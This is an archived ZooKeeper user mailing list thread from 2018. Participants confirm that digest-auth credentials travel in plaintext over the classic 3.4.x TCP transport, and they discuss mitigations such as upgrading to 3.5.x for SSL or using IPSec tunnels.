zookeeper-user mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Jan Høydahl <jan....@cominvent.com>
Subject Re: Digest auth with classic TCP transport
Date Thu, 27 Sep 2018 15:14:51 GMT
Thanks.

So what do people typically do to mitigate this? Other than restricting who has access to
this network?

--
Jan Høydahl, search solution architect
Cominvent AS - www.cominvent.com

> 27. sep. 2018 kl. 17:10 skrev Andor Molnar <andor@cloudera.com.INVALID>:
> 
> Right. It's plaintext.
> 
> 
> On Thu, Sep 27, 2018 at 4:54 PM, Jan Høydahl <jan.asf@cominvent.com> wrote:
> 
>> I am *explicitly* asking about old-style 3.4.x socket protocol, not the
>> new Netty transport which I know supports SSL.
>> 
>> My original question was whether authentication credentials are passed in
>> plaintext across the wire and thus being easy to pickup by an attacker.
>> And if that is true, if there are know ways of working around the lack of
>> SSL support for the TCP transport.
>> 
>> Martin Gainty, I cannot see how I can easily plug in TLS1.3 in my existing
>> connection between client and Zookeeper 3.4.x, but if there is a simple way
>> to do so then please share how you did it.
>> 
>> The only solution I see, as we're stuck with 3.4.x, is to setup IPSec
>> tunnels on OS level on all client/server traffic. I wanted to avoid that.
>> 
>> --
>> Jan Høydahl, search solution architect
>> Cominvent AS - www.cominvent.com
>> 
>>> 27. sep. 2018 kl. 16:14 skrev Andor Molnar <andor@cloudera.com.INVALID>:
>>> 
>>> https://cwiki.apache.org/confluence/display/ZOOKEEPER/
>> ZooKeeper+SSL+User+Guide
>>> 
>>> SSL (client-server) has been added in 3.5.1
>>> SSL server-server support is being reviewed on GitHub.
>>> 
>>> Regards,
>>> Andor
>>> 
>>> 
>>> 
>>> On Thu, Sep 27, 2018 at 3:46 PM, Jan Høydahl <jan.asf@cominvent.com>
>> wrote:
>>> 
>>>> Hi,
>>>> 
>>>>> if you're prevented from implementing SSL why not use TLSv1.3?
>>>> 
>>>> 
>>>> I have not found any evidence that Zookeeper server nor (Java) client
>>>> supports TLS in version 3.4.13. Please point me to some docs or
>> tutorial.
>>>> We don't want to fork Zookeeper to implement this stuff ourselves :)
>>>> 
>>>> --
>>>> Jan Høydahl, search solution architect
>>>> Cominvent AS - www.cominvent.com
>>>> 
>>>>> 27. sep. 2018 kl. 15:17 skrev Martin Gainty <mgainty@hotmail.com>:
>>>>> 
>>>>> 
>>>>> ________________________________
>>>>> From: Jan Høydahl <jan.asf@cominvent.com>
>>>>> Sent: Thursday, September 27, 2018 5:12 AM
>>>>> To: user@zookeeper.apache.org
>>>>> Subject: Digest auth with classic TCP transport
>>>>> 
>>>>> Hi
>>>>> 
>>>>> We use ZK 3.4.13, and unfortunately cannot use Netty transport and SSL.
>>>>> We plan to use digest authentication and Zookeeper ACL protection.
>>>>> 
>>>>> Question is, since we cannot use SSL, is there some other way to make
>>>> sure the user credentials are not sniffed over the network and thus let
>> an
>>>> attacker impersonate our application and cange the content in Zookeeper?
>>>> Does the Zookeeper client do some smart moves to protect/hash the
>> password
>>>> over the network? I suppose the binary transport is easy to decipher for
>>>> those who try.
>>>>> 
>>>>> MG>if you're prevented from implementing SSL why not use TLSv1.3?
>>>>> MG>with TLSv1.3 you can implement encryption/decryption with crypto
>>>> private/public keys and x509 certs
>>>>> https://en.wikipedia.org/wiki/Transport_Layer_Security
>>>>> Transport Layer Security - Wikipedia<https://en.
>>>> wikipedia.org/wiki/Transport_Layer_Security>
>>>>> Transport Layer Security (TLS) – and its predecessor, Secure Sockets
>>>> Layer (SSL), which is now deprecated by the Internet Engineering Task
>> Force
>>>> (IETF) – are cryptographic protocols that provide communications
>> security
>>>> over a computer network. Several versions of the protocols find
>> widespread
>>>> use in applications such as web browsing, email, instant messaging, and
>>>> voice over IP (VoIP).
>>>>> en.wikipedia.org
>>>>> 
>>>>> 
>>>>> MG>path of least resistance is to contact verisign and ask them to
>>>> generate keys, certs and allow them to act as CA
>>>>> MG>Caveat: tls1.3 implementation is slow and is supported by Mozilla
>>>> v60...and some versions of chrome
>>>>> MG>as far as ciphers to prevent MIMA do not implement TLS_DH_anon
and
>>>> TLS_ECDH_anon key agreement methods MG>do not authenticate the server
>>>>> MG>you will want public key size to be min 2048bit to conform to chrome
>>>> secure transmission requirements
>>>>> MG>securing message is done thru MD5 or SHA but you will need to
>>>> incorporate selected algo into
>>>>> MG>supported cipher-suite(s)
>>>>> https://en.wikipedia.org/wiki/Cipher_suite
>>>>> Cipher suite - Wikipedia<https://en.wikipedia.org/wiki/Cipher_suite>
>>>>> A cipher suite is a set of algorithms that help secure a network
>>>> connection that uses Transport Layer Security (TLS) or Secure Socket
>> Layer
>>>> (SSL). The set of algorithms that cipher suites usually contain
>> include: a
>>>> key exchange algorithm, a bulk encryption algorithm, and a message
>>>> authentication code (MAC) algorithm.. The key exchange algorithm is
>> used to
>>>> exchange a key between two devices.
>>>>> en.wikipedia.org
>>>>> 
>>>>> 
>>>>> HTH
>>>>> Martin
>>>>> --
>>>>> Jan Høydahl
>>>>> Cominvent AS - www.cominvent.com<http://www.cominvent.com>
>>>>> 
>>>> 
>>>> 
>> 
>> 


Mime
  • Unnamed multipart/alternative (inline, None, 0 bytes)
View raw message